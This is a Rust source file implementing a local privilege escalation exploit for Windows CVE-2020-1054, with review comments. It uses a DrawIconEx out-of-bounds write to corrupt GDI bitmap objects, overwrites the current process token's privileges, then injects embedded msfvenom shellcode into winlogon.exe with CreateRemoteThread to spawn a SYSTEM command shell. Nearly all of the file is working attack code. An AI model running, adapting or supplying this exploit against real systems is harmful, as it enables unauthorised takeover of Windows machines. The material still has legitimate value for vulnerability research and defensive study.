/* 
CVE-2020-1054 LPE written by @0xeb_bp
Bug found by Netanel Ben-Simon and Yoav Alon from Check Point Research 
and bee13oy of Qihoo 360 Vulcan Team.
*/

use winapi::shared::windef::{ HDC, HBITMAP, HICON };
use winapi::um::wingdi::{   
                        CreateCompatibleDC, 
                        CreateCompatibleBitmap, 
                        SelectObject,
                        SetBitmapBits, 
                        GetBitmapBits
                        };
use winapi::um::winuser::DrawIconEx;
use winapi::um::{processthreadsapi, memoryapi, handleapi};
use winapi::um::winnt::*;
use winapi::um::psapi::{EnumProcesses, EnumProcessModules, GetModuleBaseNameA};
use winapi::shared::ntstatus::{STATUS_SUCCESS};
use winapi::shared::minwindef::{HMODULE, LPVOID};
use winapi::ctypes::c_void;

use ntapi::ntexapi;
use ntapi::ntrtl::RtlGetCurrentPeb;
use ntapi::ntpebteb::PPEB;

use std::mem::{ size_of, MaybeUninit };
use std::ptr::null_mut;


/// Entry point for the CVE-2020-1054 proof of concept.
///
/// Sequence, as implemented below:
/// 1. Open the current process token and locate its kernel object address in the
///    system-wide handle table returned by `NtQuerySystemInformation`.
/// 2. Allocate GDI bitmaps and read their surface-object addresses from the PEB's
///    `GdiSharedHandleTable`.
/// 3. Call `DrawIconEx` with crafted arguments (the bug named in the file header).
/// 4. Use `GetBitmapBits`/`SetBitmapBits` on the selected bitmaps, with the intent of
///    overwriting 0x18 bytes at the computed token-privileges address with 0xff.
/// 5. Find `winlogon.exe` and run the embedded shellcode in it via
///    `VirtualAllocEx` + `WriteProcessMemory` + `CreateRemoteThread`.
///
/// Every failure path prints a message and returns. Most handles and allocations
/// (DCs, bitmaps, boxed out-parameters, process/thread handles) are never released.
/// NOTE(review): the hard-coded offsets (0x40, 0x900, 0x6fe10, ...) are tied to
/// specific Windows builds/patch levels, and this program does not check which one
/// it is running on. Confirm them against the target.
// Presumably needed for hex literals such as 0xffe00000 that exceed the range of
// the i32 parameter they are passed to.
#[allow(overflowing_literals)]
fn main() {
    println!("CVE-2020-1054 LPE written by @0xeb_bp\n");

    // Initial buffer size guess; the buffer is grown below to whatever size the kernel reports.
    let sys_handle_info_ex_size = size_of::<ntexapi::SYSTEM_HANDLE_INFORMATION_EX>();

    let pid = unsafe { processthreadsapi::GetCurrentProcessId() as usize };
    let h_proc = unsafe { processthreadsapi::GetCurrentProcess() };
    // Heap slot that receives the token handle. The Box is leaked via into_raw and never freed.
    let t_handle = Box::into_raw(Box::<usize>::new(0));

    let ret = unsafe { processthreadsapi::OpenProcessToken(h_proc, TOKEN_QUERY, t_handle as PHANDLE) };
    if ret == 0 {
        println!("[-] Error Getting Current PID Token");
        return;
    }

    println!("[+] Pid                                = {:?}", pid);
    unsafe { println!("[+] Token Handle                       = {:x}", *t_handle); }

    // Out-parameter for returned/required lengths.
    // It is reused later by EnumProcesses and EnumProcessModules.
    let mut len: u32 = 0;
    let len_ptr = &mut len as *mut u32;

    let mut sys_handle_info_ex: Vec<u8> = vec![0; sys_handle_info_ex_size];

    // Information class 0x40. The result is read as SYSTEM_HANDLE_INFORMATION_EX
    // below, so this is presumably SystemExtendedHandleInformation.
    let mut ret = unsafe { ntexapi::NtQuerySystemInformation(0x40, sys_handle_info_ex.as_ptr() as *mut c_void,
        sys_handle_info_ex_size as u32, len_ptr) };

    // keep going until enough space is allocated and we get a STATUS_SUCCESS
    // NOTE(review): every non-success status is retried, not only a length
    // mismatch, so a persistent error makes this loop spin forever.
    while ret != STATUS_SUCCESS {
        sys_handle_info_ex = vec![0; len as usize];

        ret = unsafe { ntexapi::NtQuerySystemInformation(0x40, sys_handle_info_ex.as_ptr() 
            as *mut c_void, len, len_ptr) };
    }

    let sys_handle_info_ex_ptr = sys_handle_info_ex.as_ptr() as ntexapi::PSYSTEM_HANDLE_INFORMATION_EX;
    let num_handles = unsafe { (*sys_handle_info_ex_ptr).NumberOfHandles as usize };

    /*
    SYSTEM_HANDLE_INFORMATION_EX
    Offset (x86)	Offset (x64)	Definition
    0x00	        0x00	        ULONG_PTR NumberOfHandles;
    0x04	        0x08            ULONG_PTR Reserved;
    0x08	        0x10        	SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles [1];
    */

    // Despite its name, this ends up holding the kernel address of the token object
    // (it is printed as "PID Token Address"). It stays 0 if no matching entry is found.
    let mut pid_eprocess: usize = 0;
    unsafe {
        // Skip the 0x10-byte header (x64 layout above) to reach Handles[0].
        let p = sys_handle_info_ex.as_ptr().offset(0x10);
        for handle in 0..num_handles {
            // 40 bytes per entry: the assumed x64 size of SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX.
            let offset = handle * 40;
            let z = p.offset(offset as isize) as ntexapi::PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
            // Match this process's entry for the token handle opened above.
            if (*z).UniqueProcessId == pid {
                if (*z).HandleValue == *t_handle {
                    pid_eprocess = (*z).Object as usize;
                    println!("[+] PID Token Address                  = {:x}", pid_eprocess as usize);
                    break;
                }
            }
        }
    }

    // Offset 0x40 into the token object is treated as the privileges field.
    // This offset is assumed for the target Windows build; confirm it.
    let pid_token_privs_address = pid_eprocess+0x40;
    println!("[+] PID Token Privilege Address        = {:x}", pid_token_privs_address);

    // size of base bitmap
    let base_size =   0x51500;

    // Create device context
    let base_dc: HDC = unsafe {
        CreateCompatibleDC(null_mut())
    };

    // Create Bitmap
    let base_handle: HBITMAP = unsafe {
        CreateCompatibleBitmap(base_dc, base_size, 0x100) //
    };

    println!("[+] Base Bitmap Handle                 = {:x}", base_handle as usize); 

    let peb: PPEB = unsafe {
        RtlGetCurrentPeb()    
    };
    
    // Use GDI handle to calculate offset of its entry in table
    // sizeof(GDICELL64) = 0x18
    // The first pointer-sized field of that entry is read and used as the
    // bitmap's surface-object kernel address.
    let base_bm_address: usize = unsafe { 
           *( ((*peb).GdiSharedHandleTable as usize + (base_handle as usize & 0xffff) * 0x18) as *mut usize )
    };

    // Round down to a 1 MiB boundary, then add 4 GiB, e.g.:
    // 0xfffff900c3556000
    // 0x0000000100000000
    // 0xfffff901c3556000
    let oob_target = (base_bm_address & 0xfffffffffff00000) + 0x0000000100000000;

    // size of sprayed/alloc'd bitmaps
    let alloc_size: i32 = 0x6f000;
    // used to allocate x extra bitmaps after we are > the oob_target
    let mut extra_alloc = 0;

    // address of bitmap surface object that we use OOB write to increase size
    let mut oob_target_address: usize    = 0;
    // address of bitmap surface that has pvscan overwritten
    let mut pvscan_target_address;

    // surfobj2
    // used to overwrite pvscan of surfobj3
    let mut oob_target_handle: MaybeUninit<HBITMAP>    = unsafe { MaybeUninit::uninit().assume_init() };
    // surfobj3
    // address of bitmap surface object that we use the previous increased size
    // bitmap to overwrite this object's pvscan01 with a "where"
    // we can then use this to write a "what"
    let mut pvscan_target_handle: MaybeUninit<HBITMAP> = unsafe { MaybeUninit::uninit().assume_init() };

    println!("[+] Base Bitmap Surface Obj Address    = {:x}", base_bm_address); 

    // Separate DC, used only for the spray allocations below.
    let alloc_dc: HDC = unsafe {
        CreateCompatibleDC(null_mut())
    };

    println!("[+] Generating Bitmaps...");

    // Allocate bitmaps until one qualifies as the OOB target. After that, allocate
    // two more: the first is recorded as the pvScan0 target, and the loop breaks
    // right after the second is created.
    loop {
        let alloc_handle: HBITMAP = unsafe {
            CreateCompatibleBitmap(alloc_dc, alloc_size, 0x8)
        };

        // Use GDI handle to calculate offset of its entry in table
        // sizeof(GDICELL64) = 0x18
        let alloc_bm_address: usize = unsafe { 
            *( ((*peb).GdiSharedHandleTable as usize + (alloc_handle as usize & 0xffff) * 0x18) as *mut usize )
        };

        // A zero table entry is treated as allocation failure.
        if alloc_bm_address == 0 {
            println!("[-] Ran out of memory allocating Bitmaps");
            return;
        }
    
        // Candidate: at or above oob_target, with address bits 16-18 all set (mask 0x70000).
        if (alloc_bm_address >= oob_target) && (alloc_bm_address & 0x0000000000070000 == 0x70000) {
            oob_target_address = alloc_bm_address;
            unsafe { *oob_target_handle.as_mut_ptr() = alloc_handle; }
            println!("[+] Surf Obj to OOB overwrite the size = {:x}", oob_target_address);
        }

        // this is true when we've hit the oob_target and assigned an address
        if oob_target_address > 0 {
            // the second time through we are allocating the pvscan_target
            if extra_alloc == 1 {
                pvscan_target_address = alloc_bm_address;
                unsafe { *pvscan_target_handle.as_mut_ptr() = alloc_handle; }
                println!("[+] Surf Obj to overwrite pvScan01     = {:x}", pvscan_target_address);
            }
            // break out
            if extra_alloc > 1 {
                break;
            }
            extra_alloc += 1;
        }
    }

    unsafe { 
        // Select Object into DC
        // (the base bitmap becomes the drawing surface for DrawIconEx)
        SelectObject(base_dc, base_handle as *mut c_void); 
        // DrawIcon
        // Arguments map to DrawIconEx(hdc, xLeft, yTop, hIcon, cxWidth, cyWidth,
        // istepIfAniCur, hbrFlickerFreeDraw, diFlags). The return value is ignored.
        DrawIconEx(
            // device context
            base_dc, 
            // offset
            //0x8c0,   // USE FOR POST KB PATCH
            0x900, // USE FOR PRE  KB PATCH
            // iteration count
            0xb,
            // handle (hard-coded icon handle value, not created by this program)
            0x40000010003 as HICON, 
            // roughly writes per iteration
            0x0,
            // use to get oob
            0xffe00000,
            0x0, 
            null_mut(), 
            // mask
            0x1);
    }

    println!("[+] GetBitMapBits/Reading using oob_target...");
    // 0x6fe10 was calculated from these layouts:
    //typedef struct {
    //  ...
    //  } BASEOBJECT64; // sizeof = 0x18
    //typedef struct {
    //    ULONG64 dhsurf; // 0x00
    //    ULONG64 hsurf; // 0x08
    //    ULONG64 dhpdev; // 0x10
    //    ULONG64 hdev; // 0x18
    //    SIZEL sizlBitmap; // 0x20
    //    ULONG64 cjBits; // 0x28
    //    ULONG64 pvBits; // 0x30
    //    ULONG64 pvScan0; // 0x38
    //    ULONG32 lDelta; // 0x40
    //    ...
    //  } SURFOBJ64; // sizeof = 0x50
    // first read up to pvScan0
    // pvscan_target - (oob_target + 0x240) + 0x18 (BASEOBJ) + 0x38 (up to pvScan0)

    // USED FOR POST KB PATCH
    let get_data: Vec<u8> = vec![0x00; 0x6fe10];
    // USED FOR PRE  KB PATCH
    //let get_data: Vec<u8> = vec![0x00; 0x6fe18];

    // read data up to the pvScan0 in the next surf obj struct
    // we want this data so when we write over the next SURFOBJ struct
    // no critical pointers are lost
    unsafe {
        GetBitmapBits(*oob_target_handle.as_mut_ptr(), get_data.len() as i32, 
            get_data.as_ptr() as *mut c_void);
    }

    println!("[+] SetBitmapBits/Overwriting pvScan0...");
    let mut set_data: Vec<u8> = vec![];
    // reuse all data from get and overwrite pvScan0 with arbitrary address
    set_data.extend_from_slice(&get_data[..]);
    // set to PID Token Privs address
    // to_be_bytes() followed by rev() yields little-endian byte order (same as to_le_bytes()).
    let pid_token_privs_address = pid_token_privs_address.to_be_bytes().to_vec();
    let pid_token_privs_address: Vec<u8> = pid_token_privs_address.into_iter().rev().collect();
    set_data.extend_from_slice(&pid_token_privs_address[..]);
    
    let ret = unsafe { 
        SetBitmapBits(*oob_target_handle.as_mut_ptr(), set_data.len() as u32, 
            set_data.as_ptr() as *mut c_void) 
    };

    println!("[+] Overwrote pvScan01 (SetBitmapBits returned {:x} bytes)", ret);

    println!("[+] Overwriting token priviliges");

    // Write 0x18 bytes of 0xff through the second bitmap. The previous
    // SetBitmapBits call is intended to have pointed its pvScan0 at the
    // token-privileges address.
    let privs: Vec<u8> = vec![0xff; 0x18];
    let ret = unsafe { 
        SetBitmapBits(*pvscan_target_handle.as_mut_ptr(), privs.len() as u32, 
            privs.as_ptr() as *mut c_void) 
    };

    println!("[+] Overwrote token privileges (SetBitmapBits returned {:x} bytes)", ret);

    println!("[+] Searching for winlogon.exe PID");
    // NOTE(review): EnumProcesses' cb argument is a size in bytes. Passing 4096 lets
    // it fill only the first 1024 entries of this 4096-element u32 array.
    let mut processes: [u32; 4096] = [0; 4096];
    let ret = unsafe { EnumProcesses(processes.as_mut_ptr(), 4096, len_ptr) };       
    if ret == 0 {
        println!("[-] Error EnumProcesses");
        return;
    }

    // len now holds the number of bytes written; each PID is 4 bytes.
    let num_processes = len/4;

    let target_p = String::from("winlogon.exe");
    let mut winlogon_pid = 0;

    // search for winlogon.exe
    for process in 0..num_processes {
        let tpid = processes[process as usize];
        let hprocess = unsafe { processthreadsapi::OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, 0, tpid) };

        if hprocess as usize != 0 {
            // Receives the first module handle. This Box is leaked on every iteration.
            let hmodule = Box::into_raw(Box::<usize>::new(0));

            // cb = 8 bytes: room for exactly one HMODULE, the first module
            // (per the EnumProcessModules docs, the executable).
            // NOTE(review): hprocess is only closed when this call succeeds.
            let ret = unsafe {EnumProcessModules(hprocess, hmodule as *mut HMODULE, 8, len_ptr) };
            if  ret != 0 {
                let mut pname: [i8; 1024] = [0; 1024];

                unsafe { GetModuleBaseNameA(hprocess, *hmodule as HMODULE, pname.as_mut_ptr(), 1024) };

                // NOTE(review): unwrap() panics if the module name is not valid UTF-8.
                let found = String::from_utf8(pname.iter().map(|&c| c as u8).collect()).unwrap();
                // Strip the NUL padding left in the fixed-size buffer.
                let found = found.trim_matches(char::from(0));

                unsafe { handleapi::CloseHandle(hprocess) };

                if found == target_p {
                    println!("[+] Found winlogin.exe pid: {}", tpid);    
                    winlogon_pid = tpid;
                    break;
                }
            }   
        }
    }

    if winlogon_pid == 0 {
        println!("[-] Error finding winlogin.exe pid");
        return;
    }

    // inject our shellcode into winlogon.exe
    println!("[+] Injecting into winlogon.exe");
    //OpenProcess
    let hprocess = unsafe { processthreadsapi::OpenProcess(PROCESS_ALL_ACCESS, 0, winlogon_pid) };
    if hprocess as usize == 0 {
        println!("[-] Error OpenProcess winlogin.exe");
        return;
    }

    //VirtualAllocEx
    // One page (0x1000 bytes), readable/writable/executable, in the target process.
    let hmem = unsafe { memoryapi::VirtualAllocEx(hprocess, null_mut(), 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE) };
    if hmem as usize == 0 {
        println!("[-] Error VirtualAllocEx");
        return;
    }

    // msfvenom shellcode
    // msfvenom -p windows/x64/exec CMD=cmd exitfunc=thread -b "\x00"
    let shellcode = [
        0x48u8,0x31,0xc9,0x48,0x81,0xe9,0xde,0xff,0xff,0xff,0x48,0x8d,0x05,0xef,0xff,
        0xff,0xff,0x48,0xbb,0xd9,0x13,0x74,0x30,0x61,0x6e,0x0c,0x7b,0x48,0x31,0x58,
        0x27,0x48,0x2d,0xf8,0xff,0xff,0xff,0xe2,0xf4,0x25,0x5b,0xf7,0xd4,0x91,0x86,
        0xcc,0x7b,0xd9,0x13,0x35,0x61,0x20,0x3e,0x5e,0x2a,0x8f,0x5b,0x45,0xe2,0x04,
        0x26,0x87,0x29,0xb9,0x5b,0xff,0x62,0x79,0x26,0x87,0x29,0xf9,0x5b,0xff,0x42,
        0x31,0x26,0x03,0xcc,0x93,0x59,0x39,0x01,0xa8,0x26,0x3d,0xbb,0x75,0x2f,0x15,
        0x4c,0x63,0x42,0x2c,0x3a,0x18,0xda,0x79,0x71,0x60,0xaf,0xee,0x96,0x8b,0x52,
        0x25,0x78,0xea,0x3c,0x2c,0xf0,0x9b,0x2f,0x3c,0x31,0xb1,0xe5,0x8c,0xf3,0xd9,
        0x13,0x74,0x78,0xe4,0xae,0x78,0x1c,0x91,0x12,0xa4,0x60,0xea,0x26,0x14,0x3f,
        0x52,0x53,0x54,0x79,0x60,0xbe,0xef,0x2d,0x91,0xec,0xbd,0x71,0xea,0x5a,0x84,
        0x33,0xd8,0xc5,0x39,0x01,0xa8,0x26,0x3d,0xbb,0x75,0x52,0xb5,0xf9,0x6c,0x2f,
        0x0d,0xba,0xe1,0xf3,0x01,0xc1,0x2d,0x6d,0x40,0x5f,0xd1,0x56,0x4d,0xe1,0x14,
        0xb6,0x54,0x3f,0x52,0x53,0x50,0x79,0x60,0xbe,0x6a,0x3a,0x52,0x1f,0x3c,0x74,
        0xea,0x2e,0x10,0x32,0xd8,0xc3,0x35,0xbb,0x65,0xe6,0x44,0x7a,0x09,0x52,0x2c,
        0x71,0x39,0x30,0x55,0x21,0x98,0x4b,0x35,0x69,0x20,0x34,0x44,0xf8,0x35,0x33,
        0x35,0x62,0x9e,0x8e,0x54,0x3a,0x80,0x49,0x3c,0xbb,0x73,0x87,0x5b,0x84,0x26,
        0xec,0x29,0x78,0xdb,0x6f,0x0c,0x7b,0xd9,0x13,0x74,0x30,0x61,0x26,0x81,0xf6,
        0xd8,0x12,0x74,0x30,0x20,0xd4,0x3d,0xf0,0xb6,0x94,0x8b,0xe5,0xda,0x8e,0x11,
        0x51,0xd3,0x52,0xce,0x96,0xf4,0xd3,0x91,0x84,0x0c,0x5b,0xf7,0xf4,0x49,0x52,
        0x0a,0x07,0xd3,0x93,0x8f,0xd0,0x14,0x6b,0xb7,0x3c,0xca,0x61,0x1b,0x5a,0x61,
        0x37,0x4d,0xf2,0x03,0xec,0xa1,0x53,0x0c,0x0a,0x0c,0x7b];

    //WriteProcessMemory
    let ret = unsafe { memoryapi::WriteProcessMemory(hprocess, hmem, shellcode.as_ptr() as *const c_void, shellcode.len(), 
                            null_mut()) };
    if ret == 0 {
        println!("[-] Error WriteProcessMemory");
        return;
    }

    println!("[+] Spawning shell...");
    //CreateRemoteThread
    // Reinterpret the remote allocation's address as the thread start routine
    // that CreateRemoteThread expects. The process and thread handles are never closed.
    let f = unsafe { Some(*(&hmem as *const _ as *const unsafe extern "system" fn(LPVOID) -> u32)) };
    let ret = unsafe { processthreadsapi::CreateRemoteThread(hprocess, null_mut(), 0, f, null_mut(), 0, null_mut()) };
    if ret as usize == 0 {
        println!("Error CreateRemoteThread");
        return;
    }
}